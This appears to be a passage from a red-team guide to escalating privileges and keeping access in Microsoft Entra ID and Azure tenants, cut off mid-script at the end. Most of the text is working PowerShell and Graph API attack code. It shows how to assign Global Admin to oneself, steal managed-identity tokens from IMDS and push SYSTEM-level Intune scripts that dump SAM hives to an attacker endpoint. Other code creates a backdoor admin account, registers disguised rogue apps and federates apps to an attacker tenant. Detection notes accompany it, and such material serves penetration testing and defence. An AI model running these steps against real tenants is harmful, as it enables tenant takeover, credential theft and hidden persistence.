$apps = (Invoke-MgGraphRequest -Method GET -Uri "https://graph.microsoft.com/v1.0/applications?`$select=id,displayName,appId").value
foreach ($app in $apps) {
$owners = (Invoke-MgGraphRequest -Method GET -Uri "https://graph.microsoft.com/v1.0/applications/$($app.id)/owners").value
Write-Output "$($app.displayName) - Owners: $($owners.userPrincipalName -join ', ')"
}
The same goes for service principal owners. Different object, same concept.
If you own an app, add a new client secret to it immediately and authenticate as the app. Check the app's appRoles to see what permissions it already has. If it already has high permissions, you're done. If not, request Application.ReadWrite.All through the app and self-approve if the compromised user has admin consent capability (Application Administrator, Cloud Application Administrator, or Global Admin). Either way, you now have a persistent credential in a compromised app that nobody's watching.
OPSEC: Moderate. App modification events (addPassword, addKeyCredential) are logged in the Entra audit log, but most orgs don't have alerts on them. The noise level depends entirely on whether anyone is watching.
Detection: "Update application - Certificates and secrets management" in audit log when a new secret or certificate is added. Alert on credential additions to apps that already hold high-privilege permissions.
Service principal escalation
Requires: compromised service principal credentials (client secret or certificate) for an SP with admin roles.
Service principals are the runtime identity of app registrations. When an app authenticates, it authenticates as its service principal. If a service principal has been assigned admin roles (maybe by an admin who was troubleshooting something and forgot to clean up), compromising that app's credentials gives you those roles.
I've seen service principals with Global Admin sitting in tenants for years; the enumeration query below will surface them if they exist in your target. Nobody ever reviews them because they don't show up in the Entra admin center's "Users with admin roles" view. They're not users. They're apps. You have to look specifically at service principal role assignments:
$roleAssignments = (Invoke-MgGraphRequest -Method GET -Uri "https://graph.microsoft.com/v1.0/roleManagement/directory/roleAssignments?`$expand=principal").value
$roleAssignments | Where-Object { $_.principal.'@odata.type' -eq "#microsoft.graph.servicePrincipal" } |
Select-Object @{N='App';E={$_.principal.displayName}}, roleDefinitionId, directoryScopeId
Detection: Service principal sign-in logs show authentication events for the SP. "Add member to role" in the directory audit log if the SP assigns roles. Most orgs don't monitor SP sign-ins separately from user sign-ins.
Managed identity abuse
Requires: code execution on an Azure VM, Function App, or other resource with a managed identity.
If you compromise an Azure VM, Function App, Logic App, or any resource with a managed identity, you can request tokens for that identity from the Instance Metadata Service (IMDS). No credentials needed. Just an HTTP request from the machine itself.
# This only works from INSIDE the VM
$response = Invoke-RestMethod -Uri "http://169.254.169.254/metadata/identity/oauth2/token?api-version=2018-02-01&resource=https://graph.microsoft.com" -Headers @{Metadata="true"}
$token = $response.access_token
# Verify the token works (managed identities are service principals, /me won't work - use /organization)
Invoke-RestMethod -Uri "https://graph.microsoft.com/v1.0/organization" -Headers @{Authorization = "Bearer $token"}
The permissions depend on what RBAC roles and API permissions were assigned to the managed identity. I've seen Function Apps with Contributor on the entire subscription, or managed identities with Directory.ReadWrite.All in Graph. You can verify this quickly with az role assignment list --assignee <MI-object-id> and by decoding the JWT's roles claim. If you're a developer reading this: give your managed identities the minimum permissions they need. Not Contributor. Not Owner. The specific role for the specific resource.
Once you've got the token, check what it actually carries. If the managed identity has Directory.ReadWrite.All, you can modify any directory object, create service principals, add credentials to apps. If it's Application.ReadWrite.All, you're creating backdoor applications. If it's RoleManagement.ReadWrite.Directory, assign yourself Global Admin directly. Decode the JWT at jwt.ms and look at the roles claim to see exactly what you're working with.
OPSEC: Quiet. IMDS token requests are local HTTP calls that never leave the VM. The subsequent Graph API usage looks like normal workload access from the managed identity's perspective.
Detection: Managed identity sign-ins appear in the service principal sign-in logs. Look for Graph API calls from managed identities that don't normally call Graph, or role assignment operations initiated by a managed identity.
Azure RBAC to Entra escalation
Compromise an Azure VM with Contributor or Owner at subscription scope and you're not stuck in IaaS. Any managed identity on that box is one IMDS call away from Graph API tokens - and if someone granted it Directory.ReadWrite.All, you've just pivoted from infrastructure to the identity plane.
Here's what that IMDS pivot looks like in practice:
# Grab a Graph token from IMDS (local HTTP call, no credentials)
$token = (Invoke-RestMethod -Uri "http://169.254.169.254/metadata/identity/oauth2/token?api-version=2018-02-01&resource=https://graph.microsoft.com" -Headers @{Metadata="true"}).access_token
# Check what you can do with it (managed identity = SP, use /organization not /me)
Invoke-RestMethod -Uri "https://graph.microsoft.com/v1.0/organization" -Headers @{Authorization="Bearer $token"}
If that comes back with data instead of a 403, you've got Graph access. Don't bother calling `/me` with a managed identity token though. Managed identities are service principals, not users, so `/me` returns a 404 or error. Use `/organization` to confirm the token works, then decode the JWT itself to see what you have:
$tokenParts = $token.Split('.')
$padded = $tokenParts[1].Replace('-','+').Replace('_','/')
switch ($padded.Length % 4) { 2 { $padded += '==' } 3 { $padded += '=' } }
$payload = [System.Text.Encoding]::UTF8.GetString([Convert]::FromBase64String($padded))
$payload | ConvertFrom-Json | Select-Object aud, iss, roles
The `roles` claim tells you exactly what application permissions the managed identity has. If you see Directory.ReadWrite.All, Application.ReadWrite.All, or RoleManagement.ReadWrite.Directory in there, you're looking at a path to Global Admin. Or just paste the token into jwt.ms. This is one of those paths that shows up in environments where developers run workloads on Azure VMs or Function Apps. The RBAC-to-Entra boundary is porous by design, and many orgs aren't monitoring for it.
To give a sense of the RBAC surface on a real subscription: against my test tenant, MicroBurst enumerated 7 storage accounts (two still on TLS 1.0), 5 key vaults (three missing purge protection), 28 app services (most without HTTPS enforcement), and 86 RBAC assignments, including multiple Owner and User Access Administrator roles at subscription scope.
Intune admin paths
Requires: Intune Administrator role or equivalent.
Intune is an underappreciated escalation vector. If you have Intune Administrator (or even less, depending on the setup), you can deploy PowerShell scripts to any managed device. Those scripts run as SYSTEM. If a Global Admin's workstation is Intune-managed, you can push a script to it that runs in their context.
Let me spell out what SYSTEM-level script execution on every managed device actually means, because "deploy PowerShell scripts" undersells it.
- Exfiltrate SAM hashes from every managed device. Push a script that runs `reg save HKLM\SAM c:\windows\temp\sam.reg` and `reg save HKLM\SYSTEM c:\windows\temp\system.reg`, then uploads both files to an attacker-controlled endpoint. Crack offline with hashcat. Most orgs reuse the same local admin password across machines (or did before LAPS), so one cracked hash often unlocks hundreds of devices.
- Drop a backdoor local admin and enable RDP: `net user backdoor P@ssw0rd123 /add && net localgroup administrators backdoor /add`, then `reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f`. Intune reports which devices ran the script successfully, so you know exactly where you have persistent RDP access.
- Persistence note: because the account is local, it survives domain password resets. You have a backdoor that's completely independent of the AD or Entra identity plane.
Malware distribution is the obvious next step. You don't need a sophisticated delivery mechanism when you have Intune. Write a script that downloads and executes your payload. It runs as SYSTEM, and AV exclusions you've configured through Intune policy (which you also control as Intune admin) will let it through. Microsoft's own device management platform becomes your distribution system. Not one device. All of them, simultaneously.
There's also a quieter play here. A SYSTEM-level script can run netsh wlan show profile name="CorpWiFi" key=clear to dump every saved Wi-Fi password in plaintext, export VPN configurations from the registry, pull client certificates from the machine store, and read saved credentials in Credential Manager. These network access paths don't depend on the user accounts you've already compromised. A Wi-Fi password for the corporate SSID gets you on the physical network from the parking lot.
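The deployment primitive behind all of the above is a single Graph call. This is a hedged sketch against the beta Intune endpoint (`deviceManagement/deviceManagementScripts`); the display name and script body are placeholders, and beta schemas can shift:

```powershell
# Sketch: push a SYSTEM-level script to managed devices via the Intune Graph API (beta)
$script = @'
reg save HKLM\SAM C:\Windows\Temp\sam.reg
'@
$body = @{
    "@odata.type"         = "#microsoft.graph.deviceManagementScript"
    displayName           = "Compliance Remediation"   # blends in with legitimate scripts
    fileName              = "remediate.ps1"
    scriptContent         = [Convert]::ToBase64String([Text.Encoding]::UTF8.GetBytes($script))
    runAsAccount          = "system"
    enforceSignatureCheck = $false
} | ConvertTo-Json
Invoke-MgGraphRequest -Method POST -Uri "https://graph.microsoft.com/beta/deviceManagement/deviceManagementScripts" -Body $body
```

The script still needs an assignment to a device group before it runs, which is a second call against the same endpoint.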
If you think this is theoretical, look at what happened in March 2026. The Stryker attack (disclosed March 11, 2026) used exactly this path: compromised VPN credentials, pivoted to Global Admin, then issued native Intune wipe commands against 200,000+ devices across 79 countries. No malware. No custom tooling. Just legitimate Intune functionality used with stolen admin credentials. CISA issued an urgent alert on March 18, 2026 because the attack used nothing that endpoint detection would flag.
Microsoft shipped new controls in response. Multi Admin Approval (MAA) is now available for script deployment, device wipes, and role changes. Phishing-resistant MFA (FIDO2 or certificate-based, not basic SMS/push MFA) is required for privileged Intune actions. Script signing enforcement is available as a configurable policy. Scoped administration with scope tags lets you limit which admins can touch which device groups.
Here's the catch: all of these controls only work if they're enabled. MAA is opt-in. Scope tags require deliberate configuration. The exact same attack still works against any org that hasn't adopted MAA or is still running basic MFA on their Intune admin accounts. Post-Stryker, the question isn't whether Microsoft has the controls. It's whether your target org turned them on.
Even without Intune admin, if you can modify device compliance policies, you can mark a device as compliant that shouldn't be, which may satisfy Conditional Access policies that require device compliance. That's an indirect CA bypass.
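A quick way to see what compliance-gated Conditional Access actually depends on is to enumerate the policies themselves. A sketch, assuming your token carries a DeviceManagementConfiguration permission:

```powershell
# List compliance policies; each is a lever for the indirect CA bypass described above
(Invoke-MgGraphRequest -Method GET -Uri "https://graph.microsoft.com/v1.0/deviceManagement/deviceCompliancePolicies").value |
    Select-Object displayName, '@odata.type', createdDateTime
```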
Detection: Intune audit logs show script deployment and compliance policy changes. New script assignments or policy modifications by unexpected admins should alert. Defender for Endpoint logs script execution on managed devices, and with Advanced Security Audit enabled, MDE captures the full script content, not just the execution event, so defenders can inspect exactly what was pushed.
Automation Account and Runbook abuse
Requires: Contributor or Automation Contributor role on the Automation Account resource.
This one flies under the radar. Azure Automation Accounts run PowerShell or Python runbooks on a schedule or on demand. The runbook executes as whatever identity is assigned to the Automation Account. Older tenants still have "Run As" accounts (deprecated since September 2023, but Microsoft only removed the creation UI, not existing ones). Newer setups use system-assigned or user-assigned managed identities instead. Either way, the runbook inherits that identity's full permissions. If someone gave the Automation Account's identity Contributor on the subscription or Directory.ReadWrite.All in Graph because "the runbook needs to manage resources," you now have a code execution primitive running at that privilege level.
First, find what you're working with:
Get-AzAutomationAccount | Format-Table AutomationAccountName, ResourceGroupName, Location
# List runbooks in a specific Automation Account
Get-AzAutomationRunbook -AutomationAccountName "corp-automation" -ResourceGroupName "rg-infra" | Format-Table Name, State, RunbookType
# Check the identity assigned to the account (managed identity or Run As)
Get-AzAutomationAccount -Name "corp-automation" -ResourceGroupName "rg-infra" | Select-Object -ExpandProperty Identity
The attack is simple: either modify an existing runbook or create a new one. If you modify one that's already scheduled, your code runs automatically at the next trigger. If you create a new one, you start it manually. Either way, the code runs as the Automation Account's identity. Add a credential to a privileged app registration, create a new user, assign a role, whatever the identity's permissions allow.
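A sketch of the noisier variant, creating and starting a new runbook with the Az.Automation module. The runbook name and payload path are placeholders; the account and resource group names reuse the ones from the enumeration above:

```powershell
# Import a payload as a published runbook, then run it as the account's identity
Import-AzAutomationRunbook -AutomationAccountName "corp-automation" -ResourceGroupName "rg-infra" `
    -Name "Sync-HealthCheck" -Type PowerShell -Path .\payload.ps1 -Published
Start-AzAutomationRunbook -AutomationAccountName "corp-automation" -ResourceGroupName "rg-infra" `
    -Name "Sync-HealthCheck"
```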
OPSEC: Modifying an existing runbook is quieter than creating a new one. Runbook jobs show up in the Automation Account's job history, so your execution is logged. If there's an active runbook that runs frequently, slipping a few lines into it blends in better than a brand new "totally-not-malicious" runbook appearing out of nowhere.
Detection: Monitor for runbook modifications and new runbook creation in Azure Activity Log (Microsoft.Automation/automationAccounts/runbooks/write). Alert on runbook jobs that make Graph API calls or Azure role assignments that don't match the runbook's documented purpose. Also audit which identities your Automation Accounts are running as and what permissions those identities actually have.
Dangerous Entra roles
Requires: any valid user credentials for recon (role assignments are readable by default). RoleManagement.ReadWrite.Directory for assignment.
Global Admin gets all the attention, but there are other roles that are nearly as dangerous. Here's each one, how to find who holds it, and how to assign it to yourself if you have write access.
First, grab your own object ID. You'll need it for every assignment call below:
$me = Invoke-MgGraphRequest -Method GET -Uri "https://graph.microsoft.com/v1.0/me"
$me.id
| Role | Template ID | What it enables | Why it's dangerous |
|---|---|---|---|
| Privileged Role Administrator | e8611ab8-c189-46e8-94e1-60213ab1f814 | Assign any role to anyone, including Global Admin | One API call from the top. This is Global Admin with extra steps removed. |
| Privileged Auth Administrator | 7be44c8a-adaf-4e2a-84d6-ab2649e08a13 | Reset credentials and MFA for ANY user, including Global Admins | Account takeover with zero exploit complexity. Reset a GA's password, log in as them, done. |
| Application Administrator | 9b895d92-2cd3-44c7-9d02-a6ac2d5ea5c3 | Full control over all app registrations and service principals | Add a secret to any privileged app, authenticate as it, inherit all its permissions. |
| Cloud Application Administrator | 158c047a-c907-4556-b7ef-446551a6b5f7 | Same as App Admin minus on-prem/proxy apps | In cloud-only orgs (most of them now), the difference is academic. Same escalation path. |
| Exchange Administrator | 29232cdf-9323-42fd-ade2-1d097af3e4de | Full control over Exchange Online | Full email surveillance. Create mail flow rules, intercept MFA codes, hide security alerts via inbox rules. |
| Intune Administrator | 3a2c62db-5318-420d-8d74-23affee5d9d5 | Full control over Intune/Endpoint Manager | Code execution on every managed endpoint. Push scripts, wipe devices, bypass compliance-gated CA policies. |
| Partner Tier2 Support | e00e864a-17c5-4a4b-9c06-f5b95a8d5bd8 | Reset passwords for non-admin users (CSP tenants only) | Leftover from partner delegation that nobody audits. Only present if a CSP relationship exists. |
The pattern for every role in that table is identical. Swap in the template ID and you're done:
$templateId = "e8611ab8-c189-46e8-94e1-60213ab1f814" # swap this
Invoke-MgGraphRequest -Method GET -Uri "https://graph.microsoft.com/v1.0/directoryRoles(roleTemplateId='$templateId')/members"
# Assign that role to yourself (requires RoleManagement.ReadWrite.Directory)
Invoke-MgGraphRequest -Method POST -Uri "https://graph.microsoft.com/v1.0/roleManagement/directory/roleAssignments" -Body (@{
principalId = $me.id
roleDefinitionId = $templateId
directoryScopeId = "/"
} | ConvertTo-Json)
Note: directoryRoles only lists roles that have been activated in the tenant. If a role has never had a member assigned, it won't appear. For a complete picture, query roleManagement/directory/roleAssignments instead.
The one worth expanding: Privileged Role Administrator
This is the most interesting role in the table because it's self-reinforcing. Once you have it, you can assign any role to anyone, including itself. That means you can grant yourself Global Admin, Privileged Auth Admin, or anything else in a single call. You can also grant those roles to a service principal you control, creating a persistence path that survives user account remediation.
The escalation from Privileged Role Administrator to Global Admin is literally one POST. The real danger is that orgs monitor Global Admin assignments but often miss who holds the role that can create those assignments. If you're doing recon, always check this role first:
Invoke-MgGraphRequest -Method GET -Uri "https://graph.microsoft.com/v1.0/directoryRoles(roleTemplateId='e8611ab8-c189-46e8-94e1-60213ab1f814')/members"
# If you have it, go straight to Global Admin
# Same roleAssignments POST from the dangerous permissions section above,
# targeting $me.id instead of a separate user object ID.
The shortcut: straight to Global Admin
If you have RoleManagement.ReadWrite.Directory, skip the stepping stones. One call, you're Global Admin (role template ID: 62e90394-69f5-4237-9190-012177145e10):
Invoke-MgGraphRequest -Method POST -Uri "https://graph.microsoft.com/v1.0/roleManagement/directory/roleAssignments" -Body (@{
principalId = $me.id
roleDefinitionId = "62e90394-69f5-4237-9190-012177145e10" # Global Administrator
directoryScopeId = "/"
} | ConvertTo-Json)
This is why RoleManagement.ReadWrite.Directory is the most dangerous single permission in Entra. One API call and you're Global Admin. No MFA bypass, no phishing, no credential theft. Just a Graph API call that many orgs don't audit.
The principle is the same as on-prem: don't just look at who's a Global Admin. Look at who can become one.
Detection: "Add member to role" in the directory audit log. PIM alerts fire if PIM is configured. Any role assignment to Global Admin or Privileged Role Administrator outside PIM should be an immediate alert.
Privileged Identity Management (PIM)
Requires: RoleManagement.Read.Directory for enumeration. RoleManagement.ReadWrite.Directory plus MFA (and possibly approval) for activation.
Before you try any of the role assignment attacks above, you need to know if PIM is in play. PIM changes everything. Instead of permanently active role assignments, roles become "eligible" and require activation, which forces MFA and can require manager approval with a time limit. If PIM protects a role, your direct roleAssignments POST will just fail.
First, check what's actually active versus what's sitting behind a PIM gate:
Invoke-MgGraphRequest -Method GET -Uri "https://graph.microsoft.com/v1.0/roleManagement/directory/roleAssignmentScheduleInstances"
# Eligible assignments (these require activation + MFA to use)
Invoke-MgGraphRequest -Method GET -Uri "https://graph.microsoft.com/v1.0/roleManagement/directory/roleEligibilityScheduleInstances"
If you see lots of eligible assignments and few active ones, PIM is running the show. Your options narrow: you either activate an eligible assignment (which means you need the user's MFA), or you find a path that PIM doesn't cover.
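If you do have the user's MFA, activation itself is a Graph call. A sketch of self-activating an eligible Global Admin assignment ($me.id as earlier; the justification string is arbitrary, and the request is still subject to whatever MFA/approval gates the PIM policy enforces):

```powershell
# Request self-activation of an eligible role assignment for one hour
Invoke-MgGraphRequest -Method POST -Uri "https://graph.microsoft.com/v1.0/roleManagement/directory/roleAssignmentScheduleRequests" -Body (@{
    action           = "selfActivate"
    principalId      = $me.id
    roleDefinitionId = "62e90394-69f5-4237-9190-012177145e10"
    directoryScopeId = "/"
    justification    = "maintenance window"
    scheduleInfo     = @{ startDateTime = (Get-Date).ToString("o"); expiration = @{ type = "afterDuration"; duration = "PT1H" } }
} | ConvertTo-Json -Depth 4)
```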
Here's the key insight that makes this section worth reading: PIM only protects user role assignments. Service principals with the same roles are permanently active. PIM doesn't gate them, doesn't require activation, doesn't log the same way. This is why the app registration and service principal escalation paths from the earlier sections are often more practical than trying to assign directory roles directly. If a service principal already holds Privileged Role Administrator, it's always on. No MFA, no approval, no time window.
Detection: PIM activation events appear in the directory audit log under "PIM" category. Watch for activations outside business hours or from unusual IPs. Also audit which service principals hold privileged roles, since PIM won't protect those.
B2B guest attack paths
Requires: guest account in the target tenant, plus billing role access for the subscription escalation path.
Guest accounts aren't the low-risk thing many orgs treat them as. The default assumption is that a guest user has minimal permissions and limited blast radius. That assumption is wrong, and it's getting worse.
BeyondTrust published "Restless Guests" in May 2025, documenting a path where guest users with billing roles can create Azure subscriptions in the external tenant and become Owners of those subscriptions. Microsoft's response: "by design." First step: check if you have billing access as a guest. You can do this from the portal (Cost Management + Billing) or from the CLI:
az billing account list --output table
# If that returns data (not 403), create a subscription (makes you Owner)
az account alias create --name "research" \
--billing-scope "/providers/Microsoft.Billing/billingAccounts/{id}/billingProfiles/{id}/invoiceSections/{id}" \
--display-name "Research" --workload "Production"
# You now own that subscription. Create a VM with managed identity
az vm create --resource-group "rg-pivot" --name "pivot-vm" \
--image Ubuntu2204 --assign-identity
# From the VM, get a Graph token via IMDS
curl "http://169.254.169.254/metadata/identity/oauth2/token?api-version=2018-02-01&resource=https://graph.microsoft.com" -H "Metadata: true"
On the test tenant, PowerZure confirmed 3 Azure subscriptions visible to the authenticated account:
Active Subscription : Azure subscription 1
(4e5adb24-09e8-4a01-adbb-c6cee339f639)
Available Subscriptions : Azure subscription (Cap)
(2fc955b8-5901-4fad-ab4e-804600b5b0a6),
Azure subscription 1
(4e5adb24-09e8-4a01-adbb-c6cee339f639),
Subscription 1
(09f4dd5a-c526-45ba-b9cb-5e12342d8bd1)
Three subscriptions means three potential pivot points; each one is a surface where an Owner role can spawn VMs with managed identities. Defenders rarely see subscription creation as escalation because it happens in Azure RBAC, which Entra alerts don't cover.
From that Owner role, you pivot using the "Evil VM" technique: create a VM in the subscription, assign it a system-assigned managed identity, grant that managed identity an elevated role (Owner or User Access Administrator on the subscription), then use the VM's identity endpoint to get tokens and call the Graph API. The managed identity persists independently of your guest session.
The piece that's often glossed over is exactly how you go from "Owner on a subscription" to "Entra directory role." It's not automatic. The managed identity's service principal exists in Entra, but by default it only holds Azure RBAC permissions. To bridge into Entra, you use the managed identity's Graph token (obtained from IMDS) to assign itself a directory role. That only works if the RoleManagement.ReadWrite.Directory permission has been granted to the managed identity's service principal; some tenants also still expose the legacy Azure AD Graph endpoint as a fallback. The reliable path: from the VM, request a token for the Graph API resource, then call the roleManagement/directory/roleAssignments endpoint to assign Global Admin (or any role) to the managed identity's own service principal ID. Here's the full pivot from inside the VM:
$token = (Invoke-RestMethod -Uri "http://169.254.169.254/metadata/identity/oauth2/token?api-version=2018-02-01&resource=https://graph.microsoft.com" -Headers @{Metadata="true"}).access_token
# Get the managed identity's client_id from IMDS, then resolve its service principal
$clientId = (Invoke-RestMethod -Uri "http://169.254.169.254/metadata/identity/oauth2/token?api-version=2018-02-01&resource=https://management.azure.com" -Headers @{Metadata="true"}).client_id
$me = Invoke-RestMethod -Uri "https://graph.microsoft.com/v1.0/servicePrincipals?`$filter=appId eq '$clientId'" -Headers @{Authorization="Bearer $token"}
$spId = $me.value[0].id
# Assign Global Admin role to the managed identity
$body = @{ principalId = $spId; roleDefinitionId = "62e90394-69f5-4237-9190-012177145e10"; directoryScopeId = "/" } | ConvertTo-Json
Invoke-RestMethod -Method POST -Uri "https://graph.microsoft.com/v1.0/roleManagement/directory/roleAssignments" -Headers @{Authorization="Bearer $token"; "Content-Type"="application/json"} -Body $body
This requires the managed identity to already hold RoleManagement.ReadWrite.Directory. Granting that app role is itself a directory-level operation (it takes AppRoleAssignment.ReadWrite.All or an equivalently privileged session, not just subscription Owner), so in practice this leg of the pivot depends on the permission having been over-granted to the managed identity at some point. The key point stands: Azure RBAC Owner on a subscription doesn't directly grant Entra admin, but it hands you the stepping stones (VM creation, managed identity assignment, IMDS token access) to exploit whatever directory permissions those identities carry. And the pivot's API calls surface only in the service principal sign-in logs, not the interactive user sign-in logs most detections watch, because managed identities authenticate via IMDS rather than interactive sign-in.
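For completeness, here's what the app role grant looks like as Graph calls. Note the grant is a directory-level write (it needs something like AppRoleAssignment.ReadWrite.All or an equivalently privileged session); $spId is the managed identity's service principal object ID from the block above:

```powershell
# Resolve Microsoft Graph's service principal in the tenant, then the app role by value
$graphSp = (Invoke-MgGraphRequest -Method GET -Uri "https://graph.microsoft.com/v1.0/servicePrincipals?`$filter=appId eq '00000003-0000-0000-c000-000000000000'").value[0]
$roleId = ($graphSp.appRoles | Where-Object { $_.value -eq "RoleManagement.ReadWrite.Directory" }).id
# Grant the app role to the managed identity's service principal
Invoke-MgGraphRequest -Method POST -Uri "https://graph.microsoft.com/v1.0/servicePrincipals/$spId/appRoleAssignments" -Body (@{
    principalId = $spId        # the managed identity's SP object id
    resourceId  = $graphSp.id  # Microsoft Graph's SP in the tenant
    appRoleId   = $roleId
} | ConvertTo-Json)
```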
Defenders rarely see this coming because subscription creation by a guest doesn't trigger any default Entra alerts. It shows up in Azure Activity Log under the billing resource provider, which most SOC teams aren't monitoring. The pattern is consistent: Azure RBAC and Entra ID treat guests differently, and the gaps between those two permission models create real escalation paths.
If your tenant has B2B guests (and most do), audit what Azure RBAC roles they hold. Don't just check Entra directory roles. A guest with zero Entra admin roles but Contributor on a subscription with managed identities can do more damage than you'd expect. The remediation here is straightforward: restrict guest access in Entra external collaboration settings, limit what guests can do in Azure RBAC, and actually monitor guest sign-in activity. Many orgs skip these controls entirely.
While you're auditing B2B guest access, check the cross-tenant access policies too. These control inbound and outbound trust between your tenant and partner organizations, things like B2B direct connect and whether you accept MFA or device compliance claims from external tenants. Pull the current partner configurations with GET /policies/crossTenantAccessPolicy/partners (or Invoke-MgGraphRequest -Uri "v1.0/policies/crossTenantAccessPolicy/partners") and look at what each partner entry has under inboundTrust. If you see isMfaAccepted: true or isCompliantDeviceAccepted: true, that means your tenant is trusting those claims from the partner tenant without re-verifying them locally.
The risk here is straightforward: if a partner tenant gets compromised, the attacker satisfies MFA in that tenant, and your tenant just trusts it. They walk right through your Conditional Access policies that require MFA because the claim comes in pre-satisfied. Same story with compliant device claims. Most orgs set these up during a B2B project and never revisit them. During an assessment, flag every partner with inbound trust enabled and ask whether that trust is still justified. If nobody can name the business reason for it, it probably shouldn't be there.
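The audit loop is short. A sketch that pulls every partner configuration and flags inbound trust of MFA, compliant-device, or hybrid-joined claims:

```powershell
# Flag partner tenants whose inbound trust accepts identity claims without local re-verification
$partners = (Invoke-MgGraphRequest -Method GET -Uri "https://graph.microsoft.com/v1.0/policies/crossTenantAccessPolicy/partners").value
foreach ($p in $partners) {
    $trust = $p.inboundTrust
    if ($trust.isMfaAccepted -or $trust.isCompliantDeviceAccepted -or $trust.isHybridAzureADJoinedDeviceAccepted) {
        Write-Output "$($p.tenantId) - MFA:$($trust.isMfaAccepted) CompliantDevice:$($trust.isCompliantDeviceAccepted)"
    }
}
```

Every tenant ID this prints is a partner whose compromise would walk through your MFA-gated Conditional Access.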
Detection: Guest sign-in activity in sign-in logs (userType "Guest"). Subscription creation appears in Azure Activity Log as a Microsoft.Subscription/aliases/write operation, but most SOCs don't have a detection rule for it because it's not in any default alert template and the resource provider is rarely referenced in standard SIEM content. You need to explicitly add an Activity Log alert or Azure Monitor rule filtering on this operation name. Also monitor Microsoft.Billing resource provider operations by guest accounts, and watch for new role assignments (Microsoft.Authorization/roleAssignments/write) on freshly created subscriptions, which is where the actual escalation happens.
Once you've escalated, you have Global Admin or equivalent. You own the tenant. But that access is fragile. It's one password reset, one alert, one suspicious sign-in notification away from being revoked. You need to make it stick.
Persistence: staying in the cloud
You have admin access. Now you need to keep it. Passwords get reset. MFA gets re-enrolled. Accounts get disabled. Cloud persistence is different from on-prem: no registry run keys, no scheduled tasks on a domain controller. You're creating authentication paths that exist independently of any single user account.
Rogue app registrations
Requires: Application.ReadWrite.All permission or Application Administrator role.
This is the most reliable cloud persistence mechanism I know. Create an app registration with a client secret or certificate credential. Apps don't have MFA. Apps don't have Conditional Access (usually). When the user whose account you compromised changes their password, your app still works.
$appBody = @{
displayName = "Azure Backup Sync Agent" # Name it something boring
signInAudience = "AzureADMyOrg"
} | ConvertTo-Json
$app = Invoke-MgGraphRequest -Method POST -Uri "https://graph.microsoft.com/v1.0/applications" -Body $appBody
# Add a client secret (valid for 2 years by default)
$secretBody = @{ passwordCredential = @{ displayName = "key1" } } | ConvertTo-Json -Depth 2
$secret = Invoke-MgGraphRequest -Method POST -Uri "https://graph.microsoft.com/v1.0/applications/$($app.id)/addPassword" -Body $secretBody
# Save the secret value - it's only shown once
$secret.secretText
Here's the actual output from running the full illicit consent simulation against the test tenant:
=== STEP 1: Create rogue app registration ===
App created: C2-Test-IllicitConsent-DELETE-ME | AppId: 00000000-0000-0000-0000-000000000001 | ObjectId: 00000000-0000-0000-0000-000000000002
=== STEP 2: Add client secret ===
Secret added: test-backdoor-secret
Secret value: xXx~placeholder~secret~value~xXx
Expires: 03/19/2028 18:28:40
An attacker now has: App ID + Secret = persistent access that survives password resets
=== STEP 3: CLEANUP - Delete the rogue app ===
App deleted: 00000000-0000-0000-0000-000000000002
=== CONCLUSION ===
Illicit consent grant simulation: WORKS
Created app + secret in seconds with Application.ReadWrite.All
This is how attackers establish persistent backdoor access
That's the whole thing. Connect, create app, add secret, done. Seconds. The secret is valid until 2028. Persistent access that survives password resets, MFA re-enrollment, and account suspension. Cleaned it up right after, obviously.
The trick is naming it something that blends in. "Azure Backup Sync Agent" or "Microsoft Teams Webhook" or "SharePoint Migration Tool." Something an admin would glance at and assume is legitimate. Then request the permissions you need through admin consent (if you have an admin session) or through delegated consent if the tenant allows it.
OPSEC: Moderate. App registration events are logged in the Entra audit log, but who watches those? Most SOC teams don't alert on new app registrations or credential additions.
Detection: "Add application" and "Add service principal" in the Entra audit log. "Update application - Certificates and secrets management" when secrets are added. Alert on new app registrations by non-standard accounts.
Federated identity credentials
This is newer and sneakier. Federated identity credentials let an app authenticate without any stored secret or certificate. Instead, the app trusts tokens from an external identity provider. You set up a federation to an IdP you control (could be another Azure tenant, could be GitHub Actions, could be anything that issues OIDC tokens), and your external identity can authenticate as that app.
# This trusts tokens from an external tenant you control
$fedBody = @{
name = "external-trust"
issuer = "https://login.microsoftonline.com/{attacker-tenant-id}/v2.0"
subject = "{attacker-app-object-id}"
audiences = @("api://AzureADTokenExchange")
} | ConvertTo-Json
Invoke-MgGraphRequest -Method POST -Uri "https://graph.microsoft.com/v1.0/applications/{target-app-id}/federatedIdentityCredentials" -Body $fedBody
No secret to rotate. No certificate to expire. The federation configuration simply persists until someone removes it. The app just trusts your external tenant. This is hard to detect because there's no credential in the app's properties to find, just a federation configuration that most admins don't know to look for.
Detection: "Update application" audit log entry when federated identity credentials are added. Query applications for federatedIdentityCredentials via Graph and alert on new external issuer trusts.
The most common real-world version of this is GitHub Actions. A lot of orgs have moved their CI/CD pipelines to use workload identity federation so their workflows can authenticate to Azure without storing any secrets. The GitHub runner requests an OIDC token from GitHub's identity provider, presents it to Azure AD, and gets back an access token for the federated service principal. No client secret, no certificate, nothing stored in GitHub secrets at all. It's actually a solid security improvement over the old "store a service principal secret in your repo" approach. But it creates a different attack surface.
If you compromise a GitHub repo that has a federated credential configured, you can authenticate as that Azure service principal just by running a workflow. Fork the repo, push a malicious workflow, and if the federation is configured loosely enough, you're in. The federation config specifies which repo, branch, and optionally which environment can request tokens. A well-scoped config might say "only the main branch in the production environment of org/repo can authenticate." A lazy config might just trust any branch in the repo, or skip the environment constraint entirely.

Check the subject field on the federated credential. If it looks like repo:org/repo:ref:refs/heads/main that's scoped. If it's repo:org/repo:* or just trusts the whole repo with no branch filter, any contributor who can push a branch can pivot into Azure. You're looking for these with GET /applications/{id}/federatedIdentityCredentials and reviewing the issuer (should be https://token.actions.githubusercontent.com for GitHub) and subject claims.
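That review step can be scripted. A hedged sketch, assuming Application.Read.All: enumerate every app's federated credentials and flag wildcard subjects or GitHub subjects that don't pin a branch or environment.

```powershell
$apps = (Invoke-MgGraphRequest -Method GET -Uri "https://graph.microsoft.com/v1.0/applications?`$select=id,displayName").value
foreach ($a in $apps) {
    $fics = (Invoke-MgGraphRequest -Method GET -Uri "https://graph.microsoft.com/v1.0/applications/$($a.id)/federatedIdentityCredentials").value
    foreach ($f in $fics) {
        # Loose = wildcard subject, or a GitHub issuer whose subject pins neither branch nor environment
        $loose = $f.subject -match '\*' -or
                 ($f.issuer -eq "https://token.actions.githubusercontent.com" -and
                  $f.subject -notmatch 'ref:refs/heads/|environment:')
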